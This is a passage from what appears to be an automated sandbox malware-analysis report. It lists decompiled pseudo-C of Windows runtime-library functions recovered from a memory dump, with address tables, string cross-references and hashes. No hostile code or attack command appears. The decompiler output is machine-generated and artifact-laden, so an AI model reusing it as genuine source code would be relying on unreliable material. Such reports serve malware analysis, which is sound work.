								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x017fe620
0x017fe628
0x017fe62f
0x017fe631
0x017fe635
0x017fe637
0x017fe63e
0x01855503
0x01855503
0x017fe64c
0x017fe64c
0x017fe651
0x00000000
0x00000000
0x017fe661
0x017fe665
0x0185542a
0x017fe715
0x017fe71a
0x017fe71c
0x017fe720
0x017fe720
0x017fe727
0x017fe736
0x017fe736
0x017fe743
0x017fe743
0x017fe673
0x017fe678
0x017fe67d
0x017fe682
0x017fe685
0x017fe692
0x017fe69b
0x017fe6a3
0x017fe6ad
0x017fe6b1
0x017fe6b2
0x017fe6bb
0x017fe6bf
0x017fe6c0
0x017fe6c8
0x017fe6cc
0x017fe6d5
0x017fe6d9
0x00000000
0x00000000
0x017fe6e5
0x017fe6ea
0x017fe6f9
0x017fe70b
0x017fe70f
0x01855439
0x0185545e
0x0185545e
0x00000000
0x0185545e
0x0185543b
0x0185543e
0x01855440
0x01855445
0x01855472
0x01855475
0x0185548d
0x01855493
0x018554a9
0x00000000
0x00000000
0x018554ab
0x018554b4
0x018554bc
0x018554c8
0x018554de
0x018554fb
0x018554e0
0x018554e6
0x018554eb
0x018554eb
0x018554de
0x00000000
0x018554bc
0x01855477
0x0185547a
0x01855480
0x01855483
0x01855486
0x0185548b
0x00000000
0x00000000
0x00000000
0x0185548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01855447
0x01855447
0x01855447
0x01855447
0x0185544e
0x00000000
0x00000000
0x01855450
0x01855452
0x01855455
0x0185545a
0x00000000
0x00000000
0x00000000
0x0185545c
0x0185546a
0x0185546d
0x0185546f
0x00000000
0x0185546f
0x017fe70f

Strings

InstallLanguageFallback, xrefs: 017FE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017FE68C
@, xrefs: 017FE6C0

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 7da8e78eba05af603c7ff2a9a3019816c4c486b7ae5a329cc2edd8f07fa300c0
Instruction ID: c1996db8a2b43b912a1405bd065c0bcbd725ad45145a489f14fc234458657b7b
Opcode Fuzzy Hash: 7da8e78eba05af603c7ff2a9a3019816c4c486b7ae5a329cc2edd8f07fa300c0
Instruction Fuzzy Hash: 7F5192B25083469BD715DF68C480A6BB7E8FF88714F05096EFA85D7250FB34DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 017FB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E017FB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x18cf7a8);
				E0184D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0184D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0183D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0183F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0184DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0183B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0183B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0183E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0183A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x017fb171
0x017fb171
0x017fb171
0x017fb171
0x017fb171
0x017fb176
0x017fb17b
0x017fb180
0x017fb186
0x017fb18f
0x017fb198
0x017fb1a4
0x017fb1aa
0x01854802
0x01854802
0x01854805
0x0185480c
0x0185480e
0x017fb1d1
0x017fb1d3
0x017fb1de
0x017fb1de
0x01854817
0x0185481e
0x01854820
0x01854822
0x01854822
0x01854824
0x01854824
0x0185482a
0x00000000
0x00000000
0x01854835
0x0185483a
0x0185483d
0x0185483f
0x01854842
0x01854842
0x01854842
0x01854846
0x0185484c
0x0185484e
0x01854851
0x01854851
0x01854853
0x01854854
0x01854854
0x01854858
0x0185485a
0x0185485a
0x0185485d
0x0185485f
0x01854861
0x01854861
0x01854866
0x0185486b
0x0185486e
0x01854871
0x01854876
0x01854876
0x01854878
0x0185487b
0x01854884
0x01854884
0x00000000
0x0185487d
0x0185487d
0x01854882
0x01854889
0x01854889
0x0185488f
0x01854891
0x018548e0
0x018548e2
0x018548e4
0x018548e4
0x018548e7
0x018548e7
0x018548ed
0x018548f4
0x018548f6
0x01854951
0x01854951
0x01854953
0x01854953
0x01854956
0x01854956
0x01854958
0x01854959
0x01854959
0x0185495d
0x0185495d
0x0185495f
0x0185495f
0x01854965
0x01854969
0x018549ba
0x018549ba
0x018549c1
0x018549c5
0x018549cc
0x018549d4
0x018549d7
0x018549da
0x018549e4
0x018549e5
0x018549f3
0x01854a02
0x00000000
0x01854a02
0x01854972
0x01854974
0x00000000
0x00000000
0x01854976
0x01854979
0x01854982
0x01854983
0x01854984
0x0185498b
0x0185498d
0x01854991
0x01854993
0x01854999
0x0185499d
0x018549a2
0x018549a2
0x018549a2
0x01854999
0x018549ac
0x00000000
0x018549b3
0x018548f8
0x018548fe
0x00000000
0x00000000
0x00000000
0x018548fe
0x01854895
0x0185489c
0x018548ad
0x018548b2
0x018548b5
0x018548b7
0x018548ba
0x018548bc
0x018548c6
0x018548c6
0x018548cb
0x018548d1
0x018548d4
0x018548d8
0x018548d8
0x00000000
0x018548d8
0x018548be
0x018548c0
0x00000000
0x00000000
0x018548c2
0x00000000
0x00000000
0x00000000
0x018548c4
0x00000000
0x01854882
0x0185487b
0x01854904
0x01854906
0x00000000
0x00000000
0x01854908
0x0185490e
0x00000000
0x00000000
0x01854910
0x01854917
0x01854917
0x00000000
0x01854917
0x017fb1ba
0x018547f9
0x018547fc
0x00000000
0x00000000
0x00000000
0x018547fc
0x017fb1c0
0x017fb1c0
0x017fb1c3
0x017fb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 018548AD

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 731c6edac830025cc0fc6776ee1fde13d104dfc44536b85b9ef4f8ca343def7c
Instruction ID: e3a7165fecd5379591ce89d528758bced1123fb11759545099c3c1b77de4a1e7
Opcode Fuzzy Hash: 731c6edac830025cc0fc6776ee1fde13d104dfc44536b85b9ef4f8ca343def7c
Instruction Fuzzy Hash: 6751EF71D0025A8FEB71CF68C845BAEBBB0EF04710F1442ADDD59EB292E7704A81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0181B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0181B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x18ed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01817D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E018C8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01839E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0183B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0183CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01817D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E018C8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0183AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x18e8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x18e862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x18e8628; // 0x0
							_t116 =  *0x18e862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0181b94c
0x0181b956
0x0181b95c
0x0181b95e
0x0181b964
0x0181b969
0x0181b96d
0x0181b96d
0x0181b970
0x0181b974
0x0181b97a
0x0181badf
0x0181badf
0x0181bae2
0x0181bae4
0x0181bae6
0x0181baf0
0x01862cb8
0x0181baf6
0x0181baf6
0x0181baf6
0x0181bafd
0x0181bb1f
0x0181bb1f
0x0181baff
0x0181bb00
0x0181bb00
0x0181bb03
0x0181bb03
0x0181bacb
0x0181bacf
0x0181bad0
0x0181bad1
0x0181badc
0x0181badc
0x0181b980
0x0181b980
0x0181b988
0x0181b98b
0x0181b98d
0x0181b990
0x0181b993
0x0181b999
0x0181b99b
0x0181b9a1
0x0181b9a5
0x0181b9aa
0x0181b9b0
0x0181b9bb
0x0181b9c0
0x0181b9c3
0x0181b9ca
0x0181b9cc
0x0181b9cf
0x0181b9d3
0x0181b9d7
0x0181ba94
0x0181ba94
0x0181ba98
0x0181baa3
0x01862ccb
0x0181baa9
0x0181baa9
0x0181baa9
0x0181bab1
0x01862cd5
0x01862cdd
0x01862cdd
0x0181babb
0x0181babc
0x0181bac2
0x0181bac3
0x0181bac3
0x0181bac6
0x00000000
0x0181b9dd
0x0181b9dd
0x0181b9e7
0x0181b9e7
0x0181b9ec
0x0181b9ec
0x0181b9f1
0x0181b9f5
0x0181b9fa
0x0181ba00
0x0181ba0c
0x0181ba10
0x0181ba10
0x0181ba12
0x0181ba18
0x00000000
0x00000000
0x0181bb26
0x0181bb26
0x0181ba1e
0x0181ba1e
0x0181ba23
0x0181ba25
0x0181ba2c
0x0181ba30
0x0181ba35
0x0181ba35
0x0181ba41
0x0181ba46
0x0181ba4c
0x0181ba50
0x0181ba54
0x0181ba6a
0x0181ba6e
0x0181ba70
0x0181ba74
0x0181ba78
0x0181ba7a
0x0181ba7c
0x0181ba8e
0x0181ba90
0x0181ba92
0x0181bb14
0x0181bb14
0x0181bb16
0x0181bb16
0x00000000
0x0181ba7c
0x0181bb0a
0x0181bb0d
0x00000000
0x00000000
0x00000000
0x0181bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0181B9A5

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 1649ccf7297fb8d09be181423d3d365b9d649034a1452820b098151780dc213d
Instruction ID: c74309c795703ea3d6bfbc16e1ff39391a9a14150f150a8e051fa75464a308bb
Opcode Fuzzy Hash: 1649ccf7297fb8d09be181423d3d365b9d649034a1452820b098151780dc213d
Instruction Fuzzy Hash: AA515772A09345CFC720DF2CC08092ABBF9BB88714F14496EE585D7359E730EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017F2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E017F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x18e5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x18e7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018397C0();
				}
				if( *0x18e79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18e79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01821624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01817D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0188FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01839520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0182E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0184DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x18e6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x18e6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01839980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01817D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01817D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01877016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0188FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x18e5350;
							if(_t109 != 0x18e5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0188FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01885720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x017f2d8a
0x017f2d8a
0x017f2d92
0x017f2d96
0x017f2d9e
0x017f2da0
0x017f2da3
0x017f2da5
0x017f2da8
0x017f2dab
0x017f2db2
0x0184f9aa
0x0184f9ab
0x0184f9ae
0x0184f9ae
0x017f2db8
0x017f2dc2
0x0184f9b9
0x0184f9be
0x0184f9bf
0x0184f9bf
0x017f2dcf
0x0184f9c9
0x017f2dd5
0x017f2dd5
0x017f2dd5
0x017f2dde
0x017f2de1
0x017f2e70
0x017f2e72
0x017f2e72
0x017f2de7
0x017f2deb
0x017f2e7c
0x017f2e83
0x017f2e85
0x017f2e8b
0x017f2e8d
0x017f2e92
0x017f2e92
0x017f2e85
0x017f2df1
0x017f2df7
0x017f2df9
0x017f2df9
0x017f2dfc
0x017f2dff
0x017f2e02
0x00000000
0x017f2e05
0x017f2e0c
0x0184f9d9
0x017f2e12
0x017f2e12
0x017f2e12
0x017f2e1a
0x0184f9e3
0x0184f9e9
0x0184f9f0
0x0184f9f6
0x0184f9f8
0x0184f9f8
0x0184f9f0
0x017f2e23
0x0184fa02
0x0184fa03
0x0184fa05
0x0184fa06
0x00000000
0x017f2e29
0x017f2e29
0x017f2e2e
0x017f2e34
0x017f2e3e
0x00000000
0x00000000
0x017f2e44
0x017f2e47
0x017f2e4d
0x00000000
0x00000000
0x017f2e4f
0x017f2e54
0x00000000
0x00000000
0x017f2e5a
0x017f2e5f
0x017f2e9a
0x017f2ea4
0x017f2ea5
0x017f2ea8
0x017f2eaf
0x017f2eb2
0x017f2eb5
0x0184fae9
0x0184faeb
0x0184faed
0x0184faef
0x0184faf7
0x0184faf8
0x0184fafd
0x0184faff
0x0184fb04
0x0184fb04
0x0184faff
0x017f2ec0
0x017f2ec4
0x017f2ec6
0x017f2ec8
0x0184fb14
0x0184fb18
0x0184fb1e
0x0184fb21
0x0184fb21
0x017f2ece
0x017f2ece
0x017f2ece
0x017f2ed7
0x017f2e61
0x017f2e63
0x0184fa6b
0x0184fa71
0x0184fa76
0x0184fa78
0x0184fa8a
0x0184fa7a
0x0184fa83
0x0184fa83
0x0184fa8f
0x0184fa91
0x0184fa97
0x0184fa9d
0x0184faa4
0x0184faaa
0x0184faaf
0x0184fab1
0x0184fac3
0x0184fab3
0x0184fabc
0x0184fabc
0x0184fac8
0x0184facb
0x0184fadf
0x0184fadf
0x0184facb
0x0184faa4
0x0184fa91
0x017f2e6f
0x017f2e6f
0x017f2e5f
0x0184fa13
0x0184fa15
0x0184fa17
0x0184fa1f
0x0184fa21
0x0184fa22
0x0184fa25
0x0184fa28
0x0184fa2f
0x0184fa2f
0x0184fa2a
0x0184fa2a
0x0184fa2a
0x0184fa31
0x0184fa34
0x0184fa36
0x0184fa3c
0x0184fa3e
0x0184fa41
0x0184fa43
0x0184fa45
0x0184fa45
0x0184fa41
0x0184fa3c
0x0184fa4a
0x0184fa4f
0x0184fa51
0x0184fa53
0x0184fa56
0x0184fa5b
0x0184fa5e
0x00000000
0x0184fa5e
0x017f2e23

Strings

RTL: Re-Waiting, xrefs: 0184FA4A

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 3919d000d3cbe5fb8b8f58b77e8d5f676a4dc5ef859e37f31a5a9d1b2a0ecd99
Instruction ID: e348ed633ab39308f3df131db1b442b7e1f27284767a713c2d3753234bdb2647
Opcode Fuzzy Hash: 3919d000d3cbe5fb8b8f58b77e8d5f676a4dc5ef859e37f31a5a9d1b2a0ecd99
